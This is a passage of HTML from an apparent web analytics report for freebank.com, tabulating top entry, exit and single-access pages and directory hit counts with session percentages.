href="http://www.freebank.com/robots.txt">http://www.freebank.com/robots.txt</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">9</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.05%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">9</TD></TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">7</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/_private/">http://www.freebank.com/_private/</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">10</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.05%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">10</TD></TR> <TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">8</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/_fpclass/">http://www.freebank.com/_fpclass/</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">10</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.05%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">10</TD></TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">9</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/cos/">http://www.freebank.com/cos/</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">10</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.05%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">10</TD></TR> <TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">10</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/regstr.asp?bvid=4933">http://www.freebank.com/regstr.asp?bvid=4933</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">11</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.06%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">11</TD></TR> </TABLE></CENTER> <!-- WT_CRLF --> <!-- WT_PAGEBREAK --> ><HR><P> </BODY> <BODY BGCOLOR="#FFFFFF" BACKGROUND=""> <a name="TopEntry"><!--Resources Accessed::Top Entry Pages--></A> <!-- WT_H1>Top Entry Pages</WT_H1 --> <!-- Start Strip --> <CENTER><TABLE BORDER=0 WIDTH=100%><TR> <TD ALIGN=LEFT WIDTH=100% BGCOLOR="#0000FF"><FONT SIZE=4 FACE="Arial" COLOR="#FFFFFF"><B>Top Entry Pages</B></FONT></TD> <TD BGCOLOR="#FFFFFF"><PRE> </PRE></TD> </TR></TABLE></CENTER> <!-- End Strip --> <P> <!-- WT_CRLF --> <FONT SIZE=3 FACE="Arial" COLOR="#000000"><!-- WT_DESCRIPTION -->This section identifies the first hit from a user visiting this site. This is most likely the home page but, in some cases, it may also be specific URLs that users enter to access a particular page directly. The percentages refer to the total number of user sessions.<!-- /WT_DESCRIPTION --></FONT> <!-- WT_CRLF --> <!-- WT_CRLF --> <P><CENTER><TABLE BORDER=1 CELLSPACING=0><TR> <TD><IMG SRC="index02.gif"></TD></TR></TABLE></CENTER><!-- WT_CRLF --> <P><CENTER><TABLE BORDER=1 CELLSPACING=0 WIDTH=90%> <TR BGCOLOR="#74C6F6"> <TD COLSPAN=4 ROWSPAN=1 NOWRAP><FONT SIZE=+1 FACE="Arial" COLOR="#000000"> <!-- WT_TABLE_STATS>4, .3, 4.1, .8 , .8 </WT_TABLE_STATS --> <CENTER><B>Top Entry Pages</B></CENTER></TD></TR> <!-- WT_EXCEL_SHEET_NAME>Top Entry Pages</WT_EXCEL_SHEET_NAME --> <TR BGCOLOR="#D0D0D0"> <TD WIDTH=5%><B>&nbsp;&nbsp;&nbsp;</B></TD> <TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>Pages</CENTER></B></TD> <TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>% of Total</CENTER></B></TD> <TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>User Sessions</CENTER></B></TD> </TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/index.htm">http://www.freebank.com/index.htm</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">53.31%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4179</TD></TR> <TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/editcat.html">http://www.freebank.com/editcat.html</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">5.85%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">459</TD></TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/acctsum.asp">http://www.freebank.com/acctsum.asp</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">5.16%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">405</TD></TR> <TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/editgrp.html">http://www.freebank.com/editgrp.html</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4.5%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">353</TD></TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">5</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/ccrgstr.html">http://www.freebank.com/ccrgstr.html</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2.58%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">203</TD></TR> <TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">6</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/newpay.html">http://www.freebank.com/newpay.html</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1.84%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">145</TD></TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">7</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/rgstr.html">http://www.freebank.com/rgstr.html</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1.68%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">132</TD></TR> <TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">8</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/xfer.html">http://www.freebank.com/xfer.html</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1.56%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">123</TD></TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">9</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/statemnt.html">http://www.freebank.com/statemnt.html</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1.5%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">118</TD></TR> <TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">10</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/pendbills.html">http://www.freebank.com/pendbills.html</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1.45%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">114</TD></TR> <TR BGCOLOR="#D0D0D0"> <TD>&nbsp;</TD> <TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>Total For the Pages Above</B></TD> <TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>79.49%</B></TD> <TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>6231</B></TD> </TR> </TABLE></CENTER> <!-- WT_CRLF --> <!-- WT_PAGEBREAK --> ><HR><P> </BODY> <BODY BGCOLOR="#FFFFFF" BACKGROUND=""> <a name="TopExit"><!--Resources Accessed::Top Exit Pages--></A> <!-- WT_H1>Top Exit Pages</WT_H1 --> <!-- Start Strip --> <CENTER><TABLE BORDER=0 WIDTH=100%><TR> <TD ALIGN=LEFT WIDTH=100% BGCOLOR="#0000FF"><FONT SIZE=4 FACE="Arial" COLOR="#FFFFFF"><B>Top Exit Pages</B></FONT></TD> <TD BGCOLOR="#FFFFFF"><PRE> </PRE></TD> </TR></TABLE></CENTER> <!-- End Strip --> <P> <!-- WT_CRLF --> <FONT SIZE=3 FACE="Arial" COLOR="#000000"><!-- WT_DESCRIPTION -->This section identifies the pages users were on when they left the site. The percentages refer to the total number of user sessions that started with a valid Document Type. If the session started on a document with a different type (such as a graphic or sound file), the file is not counted as an Entry Page, and the session is not counted in the total.<!-- /WT_DESCRIPTION --></FONT> <!-- WT_CRLF --> <!-- WT_CRLF --> <P><CENTER><TABLE BORDER=1 CELLSPACING=0 WIDTH=90%> <TR BGCOLOR="#74C6F6"> <TD COLSPAN=4 ROWSPAN=1 NOWRAP><FONT SIZE=+1 FACE="Arial" COLOR="#000000"> <!-- WT_TABLE_STATS>4, .3, 4.1, .8 , .8 </WT_TABLE_STATS --> <CENTER><B>Top Exit Pages</B></CENTER></TD></TR> <!-- WT_EXCEL_SHEET_NAME>Top Exit Pages</WT_EXCEL_SHEET_NAME --> <TR BGCOLOR="#D0D0D0"> <TD WIDTH=5%><B>&nbsp;&nbsp;&nbsp;</B></TD> <TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>Pages</CENTER></B></TD> <TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>% of Total</CENTER></B></TD> <TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>User Sessions</CENTER></B></TD> </TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/index.htm">http://www.freebank.com/index.htm</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">38.97%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3054</TD></TR> <TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/forrest.asp">http://www.freebank.com/forrest.asp</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">6.22%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">488</TD></TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/nbf_bye.htm">http://www.freebank.com/nbf_bye.htm</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">5.11%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">401</TD></TR> <TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/nbf_essay_gl_01.htm">http://www.freebank.com/nbf_essay_gl_01.htm</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4.98%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">391</TD></TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">5</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/nbf_pics.htm">http://www.freebank.com/nbf_pics.htm</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4.76%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">373</TD></TR> <TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">6</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/nbf_1875-07.htm">http://www.freebank.com/nbf_1875-07.htm</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4.51%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">354</TD></TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">7</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/nbf_controversies.htm">http://www.freebank.com/nbf_controversies.htm</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2.53%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">199</TD></TR> <TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">8</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/nbf_books.htm">http://www.freebank.com/nbf_books.htm</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2.05%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">161</TD></TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">9</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/nbf_more.htm">http://www.freebank.com/nbf_more.htm</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2.02%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">159</TD></TR> <TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">10</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/nbfgad.htm">http://www.freebank.com/nbfgad.htm</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1.69%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">133</TD></TR> <TR BGCOLOR="#D0D0D0"> <TD>&nbsp;</TD> <TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>Total For the Pages Above (only sessions starting on a valid document type are included)</B></TD> <TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>72.9%</B></TD> <TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>5713</B></TD> </TR> </TABLE></CENTER> <!-- WT_CRLF --> <!-- WT_PAGEBREAK --> ><HR><P> </BODY> <BODY BGCOLOR="#FFFFFF" BACKGROUND=""> <a name="TopSinglePage"><!--Resources Accessed::Single Access Pages--></A> <!-- WT_H1>Single Access Pages</WT_H1 --> <!-- Start Strip --> <CENTER><TABLE BORDER=0 WIDTH=100%><TR> <TD ALIGN=LEFT WIDTH=100% BGCOLOR="#0000FF"><FONT SIZE=4 FACE="Arial" COLOR="#FFFFFF"><B>Single Access Pages</B></FONT></TD> <TD BGCOLOR="#FFFFFF"><PRE> </PRE></TD> </TR></TABLE></CENTER> <!-- End Strip --> <P> <!-- WT_CRLF --> <FONT SIZE=3 FACE="Arial" COLOR="#000000"><!-- WT_DESCRIPTION -->This section identifies the pages on the site that visitors access and exit without viewing any other page. The percentages refer to the total number of user sessions that started with a valid Document Type. If the session started on a document with a different type (such as a graphic or sound file), the file is not counted as an Entry Page, and the session is not counted in the total<!-- /WT_DESCRIPTION --></FONT> <!-- WT_CRLF --> <!-- WT_CRLF --> <P><CENTER><TABLE BORDER=1 CELLSPACING=0><TR> <TD><IMG SRC="index03.gif"></TD></TR></TABLE></CENTER><!-- WT_CRLF --> <P><CENTER><TABLE BORDER=1 CELLSPACING=0 WIDTH=90%> <TR BGCOLOR="#74C6F6"> <TD COLSPAN=4 ROWSPAN=1 NOWRAP><FONT SIZE=+1 FACE="Arial" COLOR="#000000"> <!-- WT_TABLE_STATS>4, .3, 4.1, .8 , .8 </WT_TABLE_STATS --> <CENTER><B>Single Access Pages</B></CENTER></TD></TR> <!-- WT_EXCEL_SHEET_NAME>Single Access Pages</WT_EXCEL_SHEET_NAME --> <TR BGCOLOR="#D0D0D0"> <TD WIDTH=5%><B>&nbsp;&nbsp;&nbsp;</B></TD> <TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>Pages</CENTER></B></TD> <TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>% of Total</CENTER></B></TD> <TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>User Sessions</CENTER></B></TD> </TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/index.htm">http://www.freebank.com/index.htm</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">50.56%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2937</TD></TR> <TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/nbf_bye.htm">http://www.freebank.com/nbf_bye.htm</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">6.21%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">361</TD></TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/forrest.asp">http://www.freebank.com/forrest.asp</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">5.68%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">330</TD></TR> <TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/nbf_1875-07.htm">http://www.freebank.com/nbf_1875-07.htm</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4.66%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">271</TD></TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">5</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/nbf_pics.htm">http://www.freebank.com/nbf_pics.htm</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2.82%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">164</TD></TR> <TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">6</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/nbf_essay_gl_01.htm">http://www.freebank.com/nbf_essay_gl_01.htm</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1.94%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">113</TD></TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">7</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/nbf_books.htm">http://www.freebank.com/nbf_books.htm</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1.85%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">108</TD></TR> <TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">8</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/nbfgad.htm">http://www.freebank.com/nbfgad.htm</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1.63%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">95</TD></TR> <TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">9</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/nbf_controversies.htm">http://www.freebank.com/nbf_controversies.htm</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1.61%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">94</TD></TR> <TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">10</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B></B><BR><FONT SIZE=-1><I><A href="http://www.freebank.com/nbf_more.htm">http://www.freebank.com/nbf_more.htm</A></I></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1.54%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">90</TD></TR> <TR BGCOLOR="#D0D0D0"> <TD>&nbsp;</TD> <TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>Total For the Pages Above</B></TD> <TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>78.56%</B></TD> <TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>4563</B></TD> </TR> </TABLE></CENTER> <!-- WT_CRLF --> <!-- WT_PAGEBREAK --> ><HR><P> </BODY> <BODY BGCOLOR="#FFFFFF" BACKGROUND=""> <a name="TopDirectory"><!--Resources Accessed::Most Accessed Directories--></A> <!-- WT_H1>Most Accessed Directories</WT_H1 --> <!-- Start Strip --> <CENTER><TABLE BORDER=0 WIDTH=100%><TR> <TD ALIGN=LEFT WIDTH=100% BGCOLOR="#0000FF"><FONT SIZE=4 FACE="Arial" COLOR="#FFFFFF"><B>Most Accessed Directories</B></FONT></TD> <TD BGCOLOR="#FFFFFF"><PRE> </PRE></TD> </TR></TABLE></CENTER> <!-- End Strip --> <P> <!-- WT_CRLF --> <FONT SIZE=3 FACE="Arial" COLOR="#000000"><!-- WT_DESCRIPTION -->This section analyzes accesses to the directories of the site. This information can be useful in determining the types of data most often requested.<!-- /WT_DESCRIPTION --></FONT> <!-- WT_CRLF --> <!-- WT_CRLF --> <P><CENTER><TABLE BORDER=1 CELLSPACING=0><TR> <TD><IMG SRC="index04.gif"></TD></TR></TABLE></CENTER><!-- WT_CRLF --> <P><CENTER><TABLE BORDER=1 CELLSPACING=0 WIDTH=90%> <TR BGCOLOR="#74C6F6"> <TD COLSPAN=6 ROWSPAN=1 NOWRAP><FONT SIZE=+1 FACE="Arial" COLOR="#000000"> <!-- WT_TABLE_STATS>6, 2.4, .6 , .6 , .8, .8, .8 </WT_TABLE_STATS --> <CENTER><B>Most Accessed Directories</B></CENTER></TD></TR> <!-- WT_EXCEL_SHEET_NAME>Most Accessed Directories</WT_EXCEL_SHEET_NAME --> <TR BGCOLOR="#D0D0D0"> <TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>Path to Directory</CENTER></B></TD> <TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>Hits</CENTER></B></TD> <TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>% of Total Hits</CENTER></B></TD> <TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>Non Cached %</CENTER></B></TD> <TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>Non Cached K Xferred</CENTER></B></TD> <TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>User Sessions</CENTER></B></TD> </TR> <TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><A href="http://www.freebank.com/">http://www.freebank.com/</A></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">53776</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">85.32%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">88.93%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">735,059K</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">10312</TD></TR> <TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><A 